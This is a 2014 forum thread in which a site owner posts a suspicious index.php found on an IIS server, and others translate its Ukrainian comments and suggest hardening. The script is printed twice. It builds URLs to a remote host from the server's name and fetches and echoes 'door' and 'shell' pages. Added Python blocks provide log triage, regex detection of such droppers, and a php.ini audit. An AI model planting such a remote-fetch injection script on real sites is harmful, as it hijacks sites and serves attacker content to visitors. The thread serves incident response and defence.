
suspicious php file present on our server

Posted: Sun Oct 19, 2014 11:36 pm
by p_s_92
There is a file called index.php which got loaded on our server. The code inside the PHP file (below) seems malicious.

Code:

$key = array_search('', $_GET);
if ($key == 'test') {
    $url_server = "http://fbschool.ru/door/test1.ru" . "/" . $key . ".php";
} else {
    $url_server = "http://fbschool.ru/door/" . str_replace('www.', '', $_SERVER['SERVER_NAME']) . "/" . $key . ".php";
}
// перевірка на то чи існує файл дора
// checking if the door file exists
$Headers = @get_headers($url_server);
if (strpos($Headers[0], '200')) {
    function get_curl($url, $n) {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $content);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 600);
        if ($n == 0) {
            curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
        }
        $output = curl_exec($ch);
        curl_close($ch);
        return $output;
    }
    function get_fsockopen($url, $n) {
        $post = "";
        $u = parse_url($url);
        if ($fp = fsockopen($u['host'], !empty($u['port']) ? $u['port'] : 80)) {
            $headers = 'POST ' . $u['path'] . ' HTTP/1.0' . "\r\n";
            $headers .= 'Host: ' . $u['host'] . "\r\n";
            if ($n == 0) {
                $headers .= 'User-Agent: ' . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
            }
            $headers .= 'Content-type: text/html' . "\r\n";
            $headers .= 'Content-length: ' . strlen($post) . "\r\n";
            $headers .= 'Connection: Close' . "\r\n\r\n";
            $headers .= $post;
            fwrite($fp, $headers);
            $ret = '';
            while (!feof($fp)) {
                $ret .= fgets($fp, 1024);
            }
            $html = substr($ret, strpos($ret, "\r\n\r\n") + 4);
            fclose($fp);
        }
        return $html;
    }
    if (function_exists("curl_init")) {
        // берем сторінку дора
        // getting the door page
        $page_host = get_curl($url_server, 0);
        $page_host_arr = explode("\r\n", $page_host);
        for ($i = 4; $i <= count($page_host_arr); $i++)
            $page_host_tmp .= $page_host_arr[$i] . "\r\n";
        // берем сторінку шелла
        // getting the shell page
        $page = get_curl($page_host_arr[0], 1);
    } else {
        $page_host = get_fsockopen($url_server, 0);
        $page_host_arr = explode("\r\n", $page_host);
        for ($i = 4; $i <= count($page_host_arr); $i++)
            $page_host_tmp .= $page_host_arr[$i] . "\r\n";
        $page = get_fsockopen($page_host_arr[0], 1);
    }
    // вирізаємо всі непотрібні теги
    // removing unnecessary tags
    $page = preg_replace('//i', '', $page);
    $page = preg_replace('//i', '', $page);
    $page = preg_replace('//i', '', $page);
    $page = preg_replace('/ ", $page, 1);
    // вставка контенту
    // inserting content
    $page = preg_replace('//', " $page_host_tmp", $page, 1);
    echo $page;
    exit;
}
I do not know if it is attempting to sell some unwanted spam products or open a backdoor as I did not want to infect my computer. I used http://global.sitesafety.trendmicro.com/result.php to check the link http://fbschool.ru/door/test1.ru but did not find any information.

What steps should I take?

Any advice would be appreciated.

Re: suspicious php file present on our server

Posted: Mon Oct 20, 2014 12:11 am
by requinix
Is it your own file? No? Then it shouldn't be there. Period.

Check the modification date on the file, then look through your access logs for an indication as to how they got it on your server.

Re: suspicious php file present on our server

Posted: Mon Oct 20, 2014 9:36 pm
by p_s_92
Thanks requinix,

It is not our file. Which access logs do I need to check? We are running Win 2008 with IIS. Our server admin does not have time for these tasks.

Re: suspicious php file present on our server

Posted: Mon Oct 20, 2014 10:44 pm
by requinix
If your admin "does not have time" to investigate an intrusion into a server he manages then you have a second problem to deal with.

IIS should be configured to record access (web page, AJAX requests, etc.) to a log file. You might have to go through the IIS configuration to find out where it is, though the IIS installation directory would be a good place to check first.
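An added triage script (not from the thread) that does what requinix describes against an IIS W3C log: it finds the first request to the dropped file and the POST requests that landed in the minutes before the file's modification time, which is where the upload or exploit request usually is. The log lines, the /admin/upload.cfm path, the client addresses and the mtime are all constructed; the column order is read from the log's own #Fields header.

```python
from datetime import datetime, timedelta

# Constructed IIS W3C extended log (not from the thread). The #Fields line
# defines the column order, which differs between servers, so it is parsed
# rather than assumed. Paths, addresses and timestamps are made up.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Date: 2014-10-18 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2014-10-18 21:14:02 10.0.0.5 GET /index.cfm - 80 - 198.51.100.20 Mozilla/5.0 200 0 0 125
2014-10-18 21:15:40 10.0.0.5 POST /admin/upload.cfm - 80 - 203.0.113.7 Mozilla/5.0 200 0 0 310
2014-10-18 21:15:52 10.0.0.5 GET /index.php test= 80 - 203.0.113.7 Mozilla/5.0 200 0 0 44
2014-10-19 03:02:11 10.0.0.5 GET /index.php sale= 80 - 192.0.2.9 Googlebot/2.1 200 0 0 51
"""

def parse_iis_log(text):
    """Yield one dict per request line, keyed by the names from the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):   # IIS encodes spaces inside values as '+'
                yield dict(zip(fields, values))

def triage(text, dropped_path, mtime_str, window_minutes=30):
    """Report hits on the dropped file and the POSTs in the window before its mtime."""
    mtime = datetime.strptime(mtime_str, "%Y-%m-%d %H:%M:%S")
    first_hit, hits, prior_posts = None, [], []
    for r in parse_iis_log(text):
        ts = datetime.strptime(r["date"] + " " + r["time"], "%Y-%m-%d %H:%M:%S")
        if r["cs-uri-stem"].lower() == dropped_path.lower():
            hits.append(r)
            first_hit = first_hit or r
        elif r["cs-method"] == "POST" and mtime - timedelta(minutes=window_minutes) <= ts <= mtime:
            prior_posts.append(r)   # candidate requests that wrote the file
    return {"first_hit": first_hit, "hit_count": len(hits), "prior_posts": prior_posts,
            "suspect_ips": sorted({p["c-ip"] for p in prior_posts})}

if __name__ == "__main__":
    # mtime as read from the file's properties (constructed value here)
    report = triage(SAMPLE_LOG, "/index.php", "2014-10-18 21:15:45")
    print(report["first_hit"]["c-ip"], report["suspect_ips"])
```

Note the first hit on index.php carries the query `test=`, the empty-valued parameter the script picks up with array_search('', $_GET); that shape in the query string is itself worth searching for across the whole log.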

Re: suspicious php file present on our server

Posted: Thu Oct 23, 2014 8:08 pm
by Weirdan
Sidenote: The comments in the code are in Ukrainian. Interesting.

Re: suspicious php file present on our server

Posted: Thu Oct 23, 2014 10:14 pm
by p_s_92
Thanks requinix,
requinix wrote:If your admin "does not have time" to investigate an intrusion into a server he manages then you have a second problem to deal with.
Agreed, but a lot of times you don't have a choice and have to tolerate whoever manages the servers.
requinix wrote: IIS should be configured to record access (web page, AJAX requests, etc.) to a log file. You might have to go through the IIS configuration to find out where it is, though the IIS installation directory would be a good place to check first.
Thanks, I will check that out. Are there any guides which explain how to lock down an IIS server, scan for PHP vulnerabilities etc.?

I appreciate your time and assistance with this thread.

Re: suspicious php file present on our server

Posted: Thu Oct 23, 2014 10:17 pm
by p_s_92
Thanks Weirdan,
Weirdan wrote:Sidenote: The comments in the code are in Ukrainian. Interesting.
Can you please tell us what they mean?

It appears the code tries to open a file from some remote server and then open a socket.

I do not know if it is attempting to sell some unwanted spam products or open a backdoor

Re: suspicious php file present on our server

Posted: Fri Oct 24, 2014 8:12 pm
by Weirdan
Sure. Translator notes in square brackets (also formatted code a bit to make it easier to read):

Code:

<?php
$key = array_search('', $_GET); 
if ($key == 'test') { 
	$url_server = "http://fbschool.ru/door/test1.ru" . "/" . $key . ".php"; 
} else { 
	$url_server = "http://fbschool.ru/door/" . str_replace('www.', '', $_SERVER['SERVER_NAME']) . "/" . $key . ".php"; 
} 

// перевірка на то чи існує файл дора 
// checking if the door [backdoor or doorway?] file exists
$Headers = @get_headers($url_server); 

if (strpos($Headers[0], '200')) { 

	function get_curl($url, $n) { 
		$ch = curl_init($url); 
		curl_setopt($ch, CURLOPT_POST, true); 
		curl_setopt($ch, CURLOPT_POSTFIELDS, $content); 
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 
		curl_setopt($ch, CURLOPT_TIMEOUT, 600); 
		if ($n == 0) { 
			curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
		} 
		$output = curl_exec ($ch); 
		curl_close($ch); 
		return $output; 
	} 

	function get_fsockopen($url, $n) { 
		$post = ""; 
		$u = parse_url($url); 
		if ($fp = fsockopen($u['host'], !empty($u['port']) ? $u['port'] : 80)) { 

			$headers = 'POST ' . $u['path'] . ' HTTP/1.0' . "\r\n"; 
			$headers .= 'Host: ' . $u['host'] . "\r\n"; 
			if ($n == 0) { 
				$headers .= 'User-Agent: ' . $_SERVER['HTTP_USER_AGENT'] . "\r\n"; 
			} 
			$headers .= 'Content-type: text/html' . "\r\n"; 
			$headers .= 'Content-length: ' . strlen($post) . "\r\n"; 
			$headers .= 'Connection: Close' . "\r\n\r\n"; 
			$headers .= $post; 
			fwrite($fp, $headers); 

			$ret = ''; 
			while (!feof($fp)) { 
				$ret .= fgets($fp, 1024); 
			} 
			$html = substr($ret, strpos($ret, "\r\n\r\n") + 4); 
			fclose($fp); 
		} 
		return $html; 
	} 
	if (function_exists("curl_init")) { 
		// берем сторінку дора 
		// getting the door [see note above] page
		$page_host = get_curl($url_server, 0); 
		$page_host_arr = explode("\r\n", $page_host); 
		for ($i = 4; $i <= count($page_host_arr); $i++) 
			$page_host_tmp .= $page_host_arr[$i] . "\r\n"; 

		// берем сторінку шелла 
		// getting the shell page
		$page = get_curl($page_host_arr[0], 1); 
	} else { 
		$page_host = get_fsockopen($url_server, 0); 
		$page_host_arr = explode("\r\n", $page_host); 
		for ($i = 4; $i <= count($page_host_arr); $i++) 
			$page_host_tmp .= $page_host_arr[$i] . "\r\n"; 
		$page = get_fsockopen($page_host_arr[0], 1); 
	} 
	// вирізаємо всі непотрібні теги 
	// removing unnecessary tags
	$page = preg_replace('//i', '', $page); 
	$page = preg_replace('//i', '', $page); 
	$page = preg_replace('//i', '', $page); 
	$page = preg_replace('/ ", $page, 1); // [syntax error here]
	// вставка контенту 
	// inserting content
	$page = preg_replace('//', " $page_host_tmp", $page, 1); 
	echo $page; 
	exit; 
} 
The code appears to fetch a newline-delimited file from that server, then use data from it to get another file, which gets echoed. The code as you posted contains a syntax error, and those preg_replace calls seem to be missing their actual regexp (first parameter).
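An added indicator scan (not from the thread, and not Weirdan's code) that turns the traits Weirdan describes into detection: each regex is one trait of this script (parameter name taken from an empty-valued $_GET key, remote URL built from the server's own hostname, silenced get_headers check, visitor User-Agent forwarded upstream, eval of fetched data), and a file is flagged only when several co-occur. The two PHP samples are constructed and door.example.invalid is a placeholder; the weights and threshold are assumptions.

```python
import os
import re
# Indicators taken from the doorway script in this thread: (regex, weight, label).
# One hit such as outbound curl is normal; a file is flagged when several co-occur.
INDICATORS = [
    (r"\beval\s*\(\s*(?:file_get_contents|curl_exec|base64_decode|gzinflate)\s*\(", 5, "eval() of fetched or decoded data"),
    (r"array_search\s*\(\s*''\s*,\s*\$_GET\b", 4, "parameter name taken from an empty-valued $_GET key"),
    (r"[\"']https?://[^\"']+[\"'].*\$_SERVER\[\s*['\"]SERVER_NAME", 4, "remote URL built from the server's own hostname"),
    (r"@get_headers\s*\(", 2, "silenced remote existence check"),
    (r"(?:CURLOPT_USERAGENT|User-Agent).*\$_SERVER\[\s*['\"]HTTP_USER_AGENT", 2, "visitor User-Agent forwarded upstream (cloaking)"),
    (r"\bfsockopen\s*\(", 1, "raw-socket HTTP client"),
    (r"\b(?:curl_exec|file_get_contents)\s*\(\s*\$", 1, "outbound fetch of a variable URL"),
    (r"[\u0400-\u04FF]", 1, "Cyrillic text in a codebase that should have none"),
]
THRESHOLD = 6

def scan_source(source):
    """Return (score, matched labels) for one PHP source string."""
    hits = [(w, label) for pat, w, label in INDICATORS if re.search(pat, source)]
    return sum(w for w, _ in hits), [label for _, label in hits]

def scan_tree(root):
    """Walk a web root; return (path, score, labels, mtime) for every flagged .php file."""
    flagged = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, labels = scan_source(fh.read())
            if score >= THRESHOLD:   # mtime tells you where to start in the access logs
                flagged.append((path, score, labels, os.path.getmtime(path)))
    return flagged

# Constructed samples: the first mirrors the dropped file and the page it
# fetched (door.example.invalid is a placeholder), the second is ordinary curl use.
SUSPECT = """<?php
$key = array_search('', $_GET);
$url_server = "http://door.example.invalid/door/" . str_replace('www.', '', $_SERVER['SERVER_NAME']) . "/" . $key . ".php";
// перевірка на то чи існує файл дора
$Headers = @get_headers($url_server);
if (strpos($Headers[0], '200')) {
    curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
    eval(file_get_contents($url_server));
}
"""
BENIGN = """<?php
$ch = curl_init("https://api.example.invalid/v1/charge");
$out = curl_exec($ch);
"""
```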

Re: suspicious php file present on our server

Posted: Sat Oct 25, 2014 12:38 am
by p_s_92
Thanks Weirdan,
Weirdan wrote:Sure. Translator notes in square brackets (also formatted code a bit to make it easier to read):
The code appears to fetch a newline-delimited file from that server, then use data from it to get another file, which gets echoed. The code as you posted contains a syntax error, and those preg_replace calls seem to be missing their actual regexp (first parameter).
The file was using the eval function to evaluate a remotely fetched file using file_get_contents. It seems like an XSS exploit.

I did not want to run the file so used echo instead of eval to know the contents of the remote file being loaded and posted it here.

1. We do not use file_get_contents calls in our projects. Is blocking file_get_contents in PHP an option to reduce such risks? If so, how can that be done?

2. What are the ways we can lock down the server from running such XSS exploits?

Thanks a lot for your time and advice.

Re: suspicious php file present on our server

Posted: Mon Oct 27, 2014 4:21 am
by Weirdan
p_s_92 wrote: 1. We do not use file_get_contents calls in our projects. Is blocking file_get_contents in PHP an option to reduce such risks? If so, how can that be done?
You could use the disable_functions php.ini directive. However, file_get_contents is often used by third-party libraries. There are another two options you may want to disable instead: allow_url_fopen and allow_url_include.
These wouldn't help to prevent execution of the script you posted though, as it uses curl and fsockopen. You may want to disable eval(), but even then it would be possible to fetch the script from a remote server, store it somewhere (in temp folder, possibly) and do a local include.
2. What are the ways we can lock down the server from running such XSS exploits?
You need to find out how that file appeared on your server in the first place. Some good general practices are: escape output (for html), filter and validate input, escape input (for sql), disable execution of uploaded files (one could put php code in image EXIF tags, for example), make sure the computer you use to upload your sources to the server is secure (change your ftp passwords, run a virus scan, use sftp instead of ftp, etc).
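An added php.ini audit (not from the thread) that checks the directives Weirdan names and prints the hardened line for each weak one, so the check can be repeated after every PHP upgrade. The ini fragments are constructed and the list of functions to put in disable_functions is an assumption; eval() is a language construct, not a function, so disable_functions cannot cover it, which is why the remote-fetch switches matter more.

```python
# Directives Weirdan names with PHP's built-in defaults, and an assumed list of
# shell-spawning functions for disable_functions. eval() is a language construct,
# so disable_functions cannot block it.
DEFAULTS = {"allow_url_fopen": "1", "allow_url_include": "0"}
RISKY_FUNCTIONS = {"exec", "shell_exec", "system", "passthru", "popen", "proc_open"}

def parse_php_ini(text):
    """Return {directive: value} from php.ini text, ignoring comments and section headers."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # ';' starts a comment
        if not line or line.startswith("["):
            continue
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip().lower()] = value.strip().strip('"')
    return settings

def is_on(value):
    """php.ini booleans: On/1/True/Yes enable; Off/0/False/No/empty disable."""
    return value.strip().lower() in ("on", "1", "true", "yes")

def audit(text):
    """Return (directive, current value, hardened line) for each weak setting."""
    settings = parse_php_ini(text)
    findings = []
    for name, default in DEFAULTS.items():
        current = settings.get(name, default)   # absent directive means PHP's default applies
        if is_on(current):
            findings.append((name, current, f"{name} = Off"))
    disabled = {f.strip().lower() for f in settings.get("disable_functions", "").split(",") if f.strip()}
    if RISKY_FUNCTIONS - disabled:
        wanted = ",".join(sorted(RISKY_FUNCTIONS | disabled))
        findings.append(("disable_functions", settings.get("disable_functions", ""),
                         f"disable_functions = {wanted}"))
    return findings

# Constructed fragments: a default-like php.ini and the hardened version.
WEAK_INI = """\
[PHP]
allow_url_fopen = On
allow_url_include = Off   ; already the default
disable_functions =
"""
HARDENED_INI = """\
allow_url_fopen = Off
allow_url_include = Off
disable_functions = exec,passthru,popen,proc_open,shell_exec,system
"""
```

With allow_url_fopen off, the eval(file_get_contents("http://...")) dropper the thread starts from fails at the fetch; the curl and fsockopen paths in the fetched page are untouched by it, as Weirdan notes.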

Re: suspicious php file present on our server

Posted: Sun Nov 02, 2014 10:40 am
by p_s_92
Thanks Weirdan,

I am sorry for the late reply.
Weirdan wrote:
p_s_92 wrote: 1. We do not use file_get_contents calls in our projects. Is blocking file_get_contents in PHP an option to reduce such risks? If so, how can that be done?
You could use the disable_functions php.ini directive. However, file_get_contents is often used by third-party libraries. There are another two options you may want to disable instead: allow_url_fopen and allow_url_include.
These wouldn't help to prevent execution of the script you posted though, as it uses curl and fsockopen. You may want to disable eval(), but even then it would be possible to fetch the script from a remote server, store it somewhere (in temp folder, possibly) and do a local include.
Yes, most ways can be circumvented.
2. What are the ways we can lock down the server from running such XSS exploits?
You need to find out how that file appeared on your server in the first place. Some good general practices are: escape output (for html), filter and validate input, escape input (for sql), disable execution of uploaded files (one could put php code in image EXIF tags, for example), make sure the computer you use to upload your sources to the server is secure (change your ftp passwords, run a virus scan, use sftp instead of ftp, etc).
The server admin did not have time. We are using Mura CMS. He told us that it needs to be upgraded and that this could be how the file got there. We filter and validate input and escape input (for SQL). Escaping output is something we need to focus on.

1. How do you disable execution of uploaded files (one could put php code in image EXIF tags, for example)?

Thanks a lot for all your time and assistance with this thread.